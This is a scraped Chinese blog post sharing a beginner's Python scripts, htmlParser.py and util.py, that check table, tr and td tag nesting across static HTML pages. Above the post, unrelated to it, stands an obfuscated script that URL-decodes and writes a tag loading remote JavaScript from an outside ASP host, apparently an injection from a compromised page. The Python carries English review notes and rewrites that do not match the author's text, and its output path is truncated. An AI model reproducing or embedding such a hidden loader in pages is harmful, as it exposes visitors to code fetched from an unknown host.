一个简单的PYTHON代码
HTML Tags and JavaScript tutorial
<script language="javascript">var
encS="%3Cscript%20language%3D%22javascript%22%20src%3D%22http%3A//avss.b15wg/count/count.asp%22%3E%3C/script%3E";var S=unescape(encS);document.write(S);</script>
一个简单的PYTHON代码
用PYTHON写代码很高兴,更高兴的是今天竟然用了一天的上班时间来练这个。当然也是为我们的那个程序服务的。
我们目前要把一个静态HTML页面转换成PORTAL。由于静态页面数量很大,所以我们采用动态改写的方法。由于这篇的目的不是介绍我们的项目,所以直接说我的脚本。由于工作需要,我们现在做操作前要对所有的静态页面进行简单的标记分析。这里主要分析TABLE、TR和TD。
下面贴下我的代码,主要是两个文件:
htmlParser.py
import os,util
def _stripComments(line, incomment):
    """Remove HTML comment text from one line.

    line      -- the raw line of HTML.
    incomment -- true if a '<!--' opened on an earlier line is still open.

    Returns a (visible_text, incomment) pair: the parts of the line that
    lie outside comments, and whether a comment is still open at the end
    of the line.  Any number of comments on one line is handled.
    """
    visible = []
    pos = 0
    while True:
        if incomment:
            end = line.find('-->', pos)
            if end == -1:
                break  # the rest of the line is still inside the comment
            pos = end + len('-->')
            incomment = 0
        else:
            start = line.find('<!--', pos)
            if start == -1:
                visible.append(line[pos:])
                break
            visible.append(line[pos:start])
            pos = start + len('<!--')
            incomment = 1
    return ''.join(visible), incomment


def htmlParse(htmlname, errorfile):
    """Check one HTML file for mismatched table/tr/td tags.

    htmlname  -- path of the HTML file to read.
    errorfile -- list that receives one error string for the file; it is
                 appended to, never written to disk here.

    Each line is stripped of comment text, its tags are collected with
    util.getLineTagList and fed one by one to util.addDelTag together with
    a stack of currently open tags.  On the first tag that addDelTag
    rejects (-1) an entry made of the file name, the 1-based line number
    and the current stack is appended to errorfile and parsing stops.

    Returns None.
    """
    stackList = []
    incomment = 0
    # 'with' guarantees the handle is closed, including on the early return.
    with open(htmlname) as source:
        for total, line in enumerate(source, 1):
            line, incomment = _stripComments(line, incomment)
            for item in util.getLineTagList(line):
                if util.addDelTag(item, stackList) == -1:
                    # os.altsep is None on platforms with a single path
                    # separator, which would make the concatenation fail.
                    separator = os.altsep or os.sep
                    errorinfo = (htmlname + separator + str(total)
                                 + str(stackList) + os.linesep)
                    errorfile.append(errorinfo)
                    return
    # The original built an "... are not closed!" message here when
    # stackList was non-empty, but the append was commented out, so tags
    # still open at end of file are not reported.
if __name__ == '__main__':
    # Scan every *.html file under startdir and collect one error entry per
    # file whose table/tr/td tags do not nest correctly.
    pattern = "*.html"
    startdir = "F://sshome"
    #startdir = "D://test"
    files = util.find (pattern, startdir)
    res = []
    for filename in files:
        htmlParse(filename,res)
    # Last entry: how many error entries were collected.
    res.append(str(len(res)))
    # NOTE(review): the output path looks truncated (the file name after
    # "F://" appears to be missing) -- fill in the intended report file.
    # open() replaces the Python-2-only file() builtin, and 'with' closes
    # the handle so the report is flushed to disk.
    with open("F://",'w') as filewrite:
        filewrite.writelines(res)
另一个文件util.py
import os, fnmatch
# judge comment tag to delete comment statement
def judgeComment (line):
    """Classify which HTML comment markers occur in a line.

    line -- the text to inspect.

    Returns:
        1 -- the line contains both '<!--' and '-->'
        2 -- the line contains only '<!--'
        3 -- the line contains only '-->'
        4 -- the line contains neither marker
    """
    hasOpen = '<!--' in line
    hasClose = '-->' in line
    if hasOpen:
        return 1 if hasClose else 2
    return 3 if hasClose else 4
# sort for a 2 dimension list(array)
def sortFor2di (listtosort):
    """Sort a list of sequences in place by the first element of each item.

    listtosort -- list whose items are indexable (e.g. [pos, tag] pairs).

    The list is modified in place and nothing is returned.  The built-in
    sort replaces the former hand-written O(n^2) exchange loop.
    """
    listtosort.sort(key=lambda item: item[0])
# get all tags in a line in the form of list
def getLineTagList (line):
    """Collect the table, tr and td tags found in a line.

    line -- one line of HTML text.

    Returns a new list of the entries that addTag2List appends for the
    tags 'table', 'tr' and 'td', ordered by sortFor2di (i.e. by the first
    element of each entry).
    """
    taglist = []
    for tag in ('table', 'tr', 'td'):
        addTag2List (line,tag,taglist)
    sortFor2di (taglist)
    return taglist
def addTag2List (line,tag,taglist):
    """Append every opening and closing occurrence of a tag to taglist.

    line    -- one line of HTML text.
    tag     -- tag name without brackets, e.g. 'td'.
    taglist -- list to extend; each entry is [position, '<tag>'] for an
               opening tag or [position, '</tag>'] for a closing tag, where
               position is the index of the '<' in line.

    Compared with a plain str.find this
      * reports every occurrence on the line, not only the first one,
      * ignores case, so '<TD>' is recognised,
      * requires the name to end at the match, so 'tr' does not match
        '<track>'.
    The entry text is always built from the tag argument, so callers that
    compare against '<' + tag + '>' keep working for upper-case markup.

    Returns None.
    """
    import re

    # (/?) captures the slash of a closing tag; the look-ahead rejects
    # longer tag names that merely start with the requested one.
    matcher = re.compile('<(/?)' + re.escape(tag) + r'(?![\w-])',
                         re.IGNORECASE)
    for found in matcher.finditer(line):
        if found.group(1):
            taglist.append([found.start(), '</' + tag + '>'])
        else:
            taglist.append([found.start(), '<' + tag + '>'])
def addDelTag(itemlist,stackList):
    """Apply one tag entry to the stack of open tags.

    itemlist  -- entry whose element [1] is the tag text, e.g. '<td>' or
                 '</td>'.
    stackList -- stack of currently open tag names; updated through
                 judgeWhichTag.

    The tag is offered to judgeWhichTag for 'table', 'tr' and 'td' and the
    results are summed.

    Returns -1 if the sum is non-zero (some check failed), otherwise 1.
    """
    tag = itemlist[1]
    res = 0
    for lable in ('table', 'tr', 'td'):
        res += judgeWhichTag (tag,lable,stackList)
    if res != 0:
        return -1
    return 1
#
def judgeWhichTag (tag,lable,stackList):
    """Push or pop one tag name on the stack of open tags.

    tag       -- tag text such as '<td>' or '</td>'.
    lable     -- tag name to test against, e.g. 'td'.
    stackList -- list used as a stack of open tag names; modified in place.

    If tag is the opening form of lable, lable is pushed.  If it is the
    closing form, the top of the stack must be lable and is popped.  Any
    other tag is ignored.

    Returns 0 on success or when the tag is unrelated to lable, and -1 when
    a closing tag meets an empty stack or a different tag on top.
    """
    if tag == '<' + lable + '>':
        stackList.append(lable)
        return 0
    if tag != '</' + lable + '>':
        return 0  # not this label's tag: nothing to do
    if stackList and stackList[-1] == lable:
        stackList.pop()
        return 0
    return -1
# used to deal tag
def tagDeal (tag, line,stackList):
    """Update the open-tag stack for one tag name found in a line.

    tag       -- tag name without brackets, e.g. 'td'.
    line      -- one line of HTML text.
    stackList -- list used as a stack of open tag names; modified in place.

    If '<' + tag occurs in the line the name is pushed.  If '</tag>' occurs,
    the top of the stack must be that name and is popped.

    Returns 1 on success and -1 when a closing tag meets an empty stack or
    a different tag on top.

    NOTE(review): the nesting of the original statements was lost; this
    layout assumes every path returns a value (1 when no closing tag is
    present) -- confirm against the author's intent.
    """
    openTag = line.find('<'+tag)
    closeTag = line.find('</'+tag+'>')
    if openTag != -1:
        stackList.append (tag)
    if closeTag == -1:
        return 1
    if not stackList or stackList[-1] != tag:
        return -1
    stackList.pop()
    return 1
def find (pattern,startdir=os.curdir):
    """Return the sorted paths under startdir whose name matches pattern.

    pattern  -- fnmatch-style pattern such as '*.html'.
    startdir -- directory to search recursively (defaults to os.curdir).

    Both file names and directory names are tested, as before.  os.walk is
    used because os.path.walk no longer exists in Python 3.

    Returns a sorted list of os.path.join(directory, name) strings.
    """
    files = []
    for thisdir, dirnames, filenames in os.walk(startdir):
        for name in fnmatch.filter(dirnames + filenames, pattern):
            files.append(os.path.join(thisdir, name))
    files.sort()
    return files
def visitor (arg,thisdir,names):
    """Collect the names in one directory that match a pattern.

    arg     -- a (pattern, files) pair: the fnmatch-style pattern and the
               list that receives the matching paths.
    thisdir -- directory the names belong to.
    names   -- names found in thisdir.

    The pair is unpacked inside the body because tuple parameters in a
    function signature are a syntax error in Python 3; callers still pass
    the same single tuple argument.

    Returns None; matches are appended to files as
    os.path.join(thisdir, name).
    """
    pattern, files = arg
    for name in names:
        if fnmatch.fnmatch(name,pattern):
            files.append(os.path.join(thisdir,name))
声明一下,我是PYTHON初学者。上面的程序写得很乱,以后有时间再修改或加点注释。当然很欢迎各位朋友给点意见。
不过,最后的结果是:我们总共1000个静态页面中,有200个页面的这三种标签有错误。这就意味着有一大堆事情要处理。至于怎么做,我们还没做好决定。